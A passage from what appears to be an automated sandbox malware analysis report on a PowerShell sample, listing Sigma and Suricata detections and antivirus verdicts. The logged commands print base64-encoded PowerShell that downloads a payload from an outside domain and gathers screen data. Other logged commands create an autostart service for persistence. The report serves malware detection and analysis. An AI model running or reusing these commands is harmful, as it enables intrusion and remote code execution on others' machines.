BwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB

Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module

Source: Event Logs

Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro: Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1151 Host ID = 04a0a46e-ae93-44d5-bc36-303812edb746 Host Application = powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= Engine Version = 5.1.19041.1151 Runspace ID = ab9a35dd-3b1f-4447-b46e-8a71f95771cc Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = computer\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.Windows.Forms", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1151 Host ID = 04a0a46e-ae93-44d5-bc36-303812edb746 Host Application = powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= Engine Version = 5.1.19041.1151 Runspace ID = ab9a35dd-3b1f-4447-b46e-8a71f95771cc Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = computer\user Connected User = Shell ID = Microsoft.PowerShell, data1: , data2: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.Windows.Forms"

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ProcessId: 3068, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5012, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", ProcessId: 8976, ProcessName: powershell.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.cmdline", ProcessId: 9184, ProcessName: csc.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Temp\myRdpService.exe cakoi7, ParentImage: C:\Windows\Temp\myRdpService.exe, ParentProcessId: 8396, ParentProcessName: myRdpService.exe, ProcessCommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ProcessId: 1800, ProcessName: cmd.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8976, TargetFilename: C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.cmdline

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5052, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 8308, ProcessName: net.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5052, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , ProcessId: 8252, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5012, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", ProcessId: 8976, ProcessName: powershell.exe

Sigma detected: SC.EXE Query Execution

Source: Process started

Author: frack113: Data: Command: sc query myRdpService, CommandLine: sc query myRdpService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc query myRdpService, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7032, ParentProcessName: cmd.exe, ProcessCommandLine: sc query myRdpService, ProcessId: 2196, ProcessName: sc.exe

Sigma detected: Start Windows Service Via Net.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5052, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 8308, ProcessName: net.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.cmdline", ProcessId: 9184, ProcessName: csc.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-29T09:23:27.034543+0100	2803305	3	Unknown Traffic	192.168.11.20	49758	172.67.179.67	443	TCP
2024-11-29T09:24:25.431422+0100	2803305	3	Unknown Traffic	192.168.11.20	49765	172.67.179.67	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-29T09:22:14.218449+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49737	172.67.179.67	443	TCP
2024-11-29T09:22:16.466230+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49739	172.67.179.67	443	TCP
2024-11-29T09:22:38.905776+0100	2803274	2	Potentially Bad Traffic	192.168.11.20	49752	172.67.179.67	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: kingsmaker_4.ca.ps1

Avira: detected

Antivirus detection for dropped file

Source: C:\Windows\Temp\svczHost.exe

Avira: detection malicious, Label: TR/AVI.Agent.izors

Multi AV Scanner detection for dropped file

Source: C:\Windows\Temp\svczHost.exe

ReversingLabs: Detection: 66%

Multi AV Scanner detection for submitted file

Source: kingsmaker_4.ca.ps1

ReversingLabs: Detection: 15%

Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.20:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.20:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.20:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.20:49758 version: TLS 1.2

Source:	Binary string: bb.pdb source: powershell.exe, 00000004.00000002.3533295106.000002B4FB00D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb\|r8 source: powershell.exe, 00000008.00000002.4453976855.00000223E5570000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\Temp\svczHost.exe	File opened: C:\Windows\Temp\D2526140-28DE-4516-A926-80A0BB7F1F2E-Sigs
